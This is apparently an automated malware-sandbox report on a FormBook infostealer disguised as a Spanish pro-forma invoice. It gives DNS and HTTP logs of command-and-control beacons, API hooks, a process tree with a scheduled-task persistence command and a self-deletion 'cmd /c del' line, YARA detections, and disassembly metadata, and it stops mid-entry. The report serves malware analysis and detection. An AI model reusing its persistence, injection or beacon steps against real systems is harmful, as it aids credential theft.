                                              Oct 13, 2021 20:36:29.067773104 CEST53515398.8.8.8192.168.2.3
                                              Oct 13, 2021 20:36:49.812874079 CEST5058553192.168.2.38.8.8.8
                                              Oct 13, 2021 20:36:49.838001966 CEST53505858.8.8.8192.168.2.3

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Oct 13, 2021 20:35:46.794310093 CEST192.168.2.38.8.8.80x6e9cStandard query (0)www.palmonlae.spaceA (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.032196999 CEST192.168.2.38.8.8.80xa477Standard query (0)www.aminobalm.comA (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:29.043936014 CEST192.168.2.38.8.8.80x9873Standard query (0)www.festival-du-chanvre.comA (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:49.812874079 CEST192.168.2.38.8.8.80x8184Standard query (0)www.new-post-vehicle-site.xyzA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Oct 13, 2021 20:35:46.817334890 CEST8.8.8.8192.168.2.30x6e9cName error (3)www.palmonlae.spacenonenoneA (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)www.aminobalm.comparking3.dnstool.netCNAME (Canonical name)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)parking3.dnstool.net13.209.99.177A (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)parking3.dnstool.net3.35.27.175A (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)parking3.dnstool.net13.125.234.146A (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)parking3.dnstool.net13.228.77.229A (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST8.8.8.8192.168.2.30xa477No error (0)parking3.dnstool.net13.230.138.127A (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:29.067773104 CEST8.8.8.8192.168.2.30x9873Name error (3)www.festival-du-chanvre.comnonenoneA (IP address)IN (0x0001)
                                              Oct 13, 2021 20:36:49.838001966 CEST8.8.8.8192.168.2.30x8184Name error (3)www.new-post-vehicle-site.xyznonenoneA (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.aminobalm.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.34980613.209.99.17780C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Oct 13, 2021 20:36:07.588450909 CEST5853OUTGET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h HTTP/1.1
                                              Host: www.aminobalm.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Oct 13, 2021 20:36:07.845493078 CEST5853INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx
                                              Date: Wed, 13 Oct 2021 18:36:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              Location: https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE0
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE0
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE0

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: Factura de proforma.exe PID: 6952 Parent PID: 3212

                                              General

                                              Start time:20:34:13
                                              Start date:13/10/2021
                                              Path:C:\Users\user\Desktop\Factura de proforma.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Factura de proforma.exe'
                                              Imagebase:0x7a0000
                                              File size:495616 bytes
                                              MD5 hash:16F7045EEBB451234CA8078222C5994C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: schtasks.exe PID: 6436 Parent PID: 6952

                                              General

                                              Start time:20:34:24
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
                                              Imagebase:0x1070000
                                              File size:185856 bytes
                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 6824 Parent PID: 6436

                                              General

                                              Start time:20:34:24
                                              Start date:13/10/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7f20f0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: RegSvcs.exe PID: 6388 Parent PID: 6952

                                              General

                                              Start time:20:34:25
                                              Start date:13/10/2021
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Imagebase:0xb80000
                                              File size:45152 bytes
                                              MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: explorer.exe PID: 3352 Parent PID: 6388

                                              General

                                              Start time:20:34:26
                                              Start date:13/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff720ea0000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: cscript.exe PID: 4716 Parent PID: 3352

                                              General

                                              Start time:20:35:00
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\cscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\cscript.exe
                                              Imagebase:0x260000
                                              File size:143360 bytes
                                              MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: cmd.exe PID: 3408 Parent PID: 4716

                                              General

                                              Start time:20:35:04
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                              Imagebase:0xd80000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 6960 Parent PID: 3408

                                              General

                                              Start time:20:35:05
                                              Start date:13/10/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7f20f0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: Factura de proforma.exe PID: 6952 Parent PID: 3212 Factura de proforma.exeCOMMON

                                                Executed Functions

                                                Function 0296A2D0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0296A516
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: DO$DO
                                                • API String ID: 4139908857-1331050724
                                                • Opcode ID: f62e25c40732d463715ab3502172bd9358d8f2ff00110f41afa4426fb2ebe5bd
                                                • Instruction ID: f2d5d0644583b5552f8e4960f9d3e3ba5b327428fdf1b354da78c59b7d85ecb4
                                                • Opcode Fuzzy Hash: f62e25c40732d463715ab3502172bd9358d8f2ff00110f41afa4426fb2ebe5bd
                                                • Instruction Fuzzy Hash: 70714670A00B058FDB24DF6AC5497AAB7F5FF88204F04892DD48AE7A50DB74E945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0296AFFC, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0296C7BE,?,?,?,?,?), ref: 0296C87F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 44a43fb4171864e5b189616d7c9ecb68c546cb1765b6f0f598d39ce098820a5b
                                                • Instruction ID: db09ef27ef97487cc46d13754b8c7922682f0a06cd10e3c3fc2553e1dd5aea32
                                                • Opcode Fuzzy Hash: 44a43fb4171864e5b189616d7c9ecb68c546cb1765b6f0f598d39ce098820a5b
                                                • Instruction Fuzzy Hash: B321E7B5900208AFDB10CF99D988AEEBBF8EB48324F14841AE955A7310D774A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0296C7F0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0296C7BE,?,?,?,?,?), ref: 0296C87F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: c0636445e9f9b6b8b84c15a81cb960387ff1002574353ec00f9fa2874426f4a2
                                                • Instruction ID: b11cc1c6ce51ec8dbd92c1ba9f1834d15aa9741f699644b4ff3a71ee594350fa
                                                • Opcode Fuzzy Hash: c0636445e9f9b6b8b84c15a81cb960387ff1002574353ec00f9fa2874426f4a2
                                                • Instruction Fuzzy Hash: 832107B5D002489FDB10CFA9D584ADEFBF8FB08324F14841AE954A3350D3349945CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02969D88, Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0296A591,00000800,00000000,00000000), ref: 0296A7A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 0655a57b0dfd8b2a3f126df43cee7ddcdac39f0f3c28eb6b520df55c83f7406b
                                                • Instruction ID: 33f7df5cec8ac8c6060fa226353c5fbeadca091e29ae271d055c81dda819af52
                                                • Opcode Fuzzy Hash: 0655a57b0dfd8b2a3f126df43cee7ddcdac39f0f3c28eb6b520df55c83f7406b
                                                • Instruction Fuzzy Hash: 222157B2C043489FCB10CF9AC588AEEBBF8AB59324F15846ED555AB210C374A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02969DA0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0296A591,00000800,00000000,00000000), ref: 0296A7A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f49b9757340805a01e01f74515c96ac2e2642965f93c3ec3a94a4fb3ee40a69d
                                                • Instruction ID: be02d2c6300bd9d619ffe120d5e44ef8210a4f0b0218e140441db47e5ccea3e7
                                                • Opcode Fuzzy Hash: f49b9757340805a01e01f74515c96ac2e2642965f93c3ec3a94a4fb3ee40a69d
                                                • Instruction Fuzzy Hash: CC1114B6D002099FCB10CF9AD588AEEFBF8EB98324F14842EE515B7210C775A545CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0296A731, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0296A591,00000800,00000000,00000000), ref: 0296A7A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 38342b1452fc66021fc411d00b07eaf3e1bc8651b05ce2f2b781470f6e781837
                                                • Instruction ID: 2e197c1f5393251ea931617263b80b6cf17cf2fb3c5d0822339c822e606d1c52
                                                • Opcode Fuzzy Hash: 38342b1452fc66021fc411d00b07eaf3e1bc8651b05ce2f2b781470f6e781837
                                                • Instruction Fuzzy Hash: 311103B6D002499FCB10CFA9C588ADEFBF4AB48324F14842ED459B7610C375A545CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070C2A38, Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 070C2A9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.326126927.00000000070C0000.00000040.00000001.sdmp, Offset: 070C0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 19c68477c7ae53219f81f9d0272499085507679479a3f41b46a68a273349f8d1
                                                • Instruction ID: 7a8536ecf4daa27785ceb9640c447e380e9819acb2ac47e9f85b546250b8d262
                                                • Opcode Fuzzy Hash: 19c68477c7ae53219f81f9d0272499085507679479a3f41b46a68a273349f8d1
                                                • Instruction Fuzzy Hash: 1C1113B1800249AFDB20DF99D984BDEFFF8FB48324F248919E454A7650C375A984CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0296A4B0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0296A516
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.322151546.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 09ff0f723d4047b3e15c8e681b7c36b9a7481d24f51754e364644848d9922865
                                                • Instruction ID: 920f4a52ac540c6b6bcf3a9bc148b8bbd8a17266a0e36e7ca8cc57b9b9a81294
                                                • Opcode Fuzzy Hash: 09ff0f723d4047b3e15c8e681b7c36b9a7481d24f51754e364644848d9922865
                                                • Instruction Fuzzy Hash: CE1102B1C002498FCB10CF9AC548BDEFBF8EB88224F14842AD419B7610C374A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070C2A40, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 070C2A9D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.326126927.00000000070C0000.00000040.00000001.sdmp, Offset: 070C0000, based on PE: false
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 4919b84a1069324e85383214a7861e13e79dcd27fee335cbb9408b012283bdff
                                                • Instruction ID: a931d775f52221af39a28e3fda65e39b4a092f3ba203a668727d6a6a7a55a303
                                                • Opcode Fuzzy Hash: 4919b84a1069324e85383214a7861e13e79dcd27fee335cbb9408b012283bdff
                                                • Instruction Fuzzy Hash: C51115B58003499FDB20CF99D984BDEFBF8FB48324F148419D514A3600C374A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00EDD5E0, Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.321861481.0000000000EDD000.00000040.00000001.sdmp, Offset: 00EDD000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: baa7bf33c8f8d07a4f04f8e8fbae8fa59e6791558b976399dedf6f9cdd4e490b
                                                • Instruction ID: e5abafd4630f50581ae76399f90c99bacd5c544bc034455f26af87ff5f9c01e1
                                                • Opcode Fuzzy Hash: baa7bf33c8f8d07a4f04f8e8fbae8fa59e6791558b976399dedf6f9cdd4e490b
                                                • Instruction Fuzzy Hash: 9B2100B1508244DFDF10DF50DDC0B66BB65FB88328F24896AE8096B346C336D856CBE2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00EDD4F4, Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.321861481.0000000000EDD000.00000040.00000001.sdmp, Offset: 00EDD000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de94b9dfdce8800f5523a288f92abea3bbccd45a9db15b938882cab5643bcd44
                                                • Instruction ID: ce093e7ce30d0f9964ab1805e1216ff107baef1eded57d8348ba03a93da63c27
                                                • Opcode Fuzzy Hash: de94b9dfdce8800f5523a288f92abea3bbccd45a9db15b938882cab5643bcd44
                                                • Instruction Fuzzy Hash: E8210671508244DFDF11CF54EDC0B66BF65FB8832CF24896AE8056A346C336D856CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00EED01C, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.321877341.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d688c0377f9de90a96f14cbad1a68e235e03ccf7ba8c893c1289bf53d97ec1e
                                                • Instruction ID: 4f6e2de9a9cfd14df152e81c6782ab2b4dbaa4ac5000136c73280d6b1baa17c7
                                                • Opcode Fuzzy Hash: 1d688c0377f9de90a96f14cbad1a68e235e03ccf7ba8c893c1289bf53d97ec1e
                                                • Instruction Fuzzy Hash: F221F275508288DFDB14CF54D9C4B66BB66FB84318F28C969D80A6B246C33BD847CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00EED1D4, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.321877341.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 758f62a090b339e98e106c1336585a9d664c4312a742084b2ff10331258c0eb1
                                                • Instruction ID: 0e5830a3be2eba8002c81e64f539af9377adc7802b61d14fbaf4740c9e1f25ea
                                                • Opcode Fuzzy Hash: 758f62a090b339e98e106c1336585a9d664c4312a742084b2ff10331258c0eb1
                                                • Instruction Fuzzy Hash: FA213775508288DFDF00CF50D9C0B66BB65FB88318F20C96DD9096B266C336D846CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00EED005, Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.321877341.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 189eb8fc4aec51df48c9cc124a313f9d2dab27493d6a52f9dac0ba27008c82ac
                                                • Instruction ID: 45e96d1ff7b5ad17e41081dc6bc07d4603e3786f948011c6c7d344c9a70a2469
                                                • Opcode Fuzzy Hash: 189eb8fc4aec51df48c9cc124a313f9d2dab27493d6a52f9dac0ba27008c82ac
                                                • Instruction Fuzzy Hash: 5521807550D3C48FDB02CF20D990715BF72EB46314F28C5EAD8498B697C33A980ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00EDD4EF, Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.321861481.0000000000EDD000.00000040.00000001.sdmp, Offset: 00EDD000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d61dc1787d2e40bcc3bc80781d9ce7e3675fb42988ff872e81e6b89b770b6d0c
                                                • Instruction ID: a19c4702964fb65ebe888a1a6f8293e06bbfc978e120b1a40412872acee0f4db
                                                • Opcode Fuzzy Hash: d61dc1787d2e40bcc3bc80781d9ce7e3675fb42988ff872e81e6b89b770b6d0c
                                                • Instruction Fuzzy Hash: AA11B176408280CFCB11CF14E9C4B16BF71FB84328F2486AAD8051B756C336D85ACBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00EDD5DB, Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.321861481.0000000000EDD000.00000040.00000001.sdmp, Offset: 00EDD000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d61dc1787d2e40bcc3bc80781d9ce7e3675fb42988ff872e81e6b89b770b6d0c
                                                • Instruction ID: cdd20eab0a2731486b5e3af3e1998a5a5d97b20b020a5cfe4f438b92f5de8fcf
                                                • Opcode Fuzzy Hash: d61dc1787d2e40bcc3bc80781d9ce7e3675fb42988ff872e81e6b89b770b6d0c
                                                • Instruction Fuzzy Hash: 16117F76508280DFDB15CF10D9C4B16BF71FB94324F2486AAD8095B756C336D85ACBE2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00EED1CF, Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.321877341.0000000000EED000.00000040.00000001.sdmp, Offset: 00EED000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f3fa16786687011bd9a08694fe3083e0fc998bddbe896881cb926f4c2f024f48
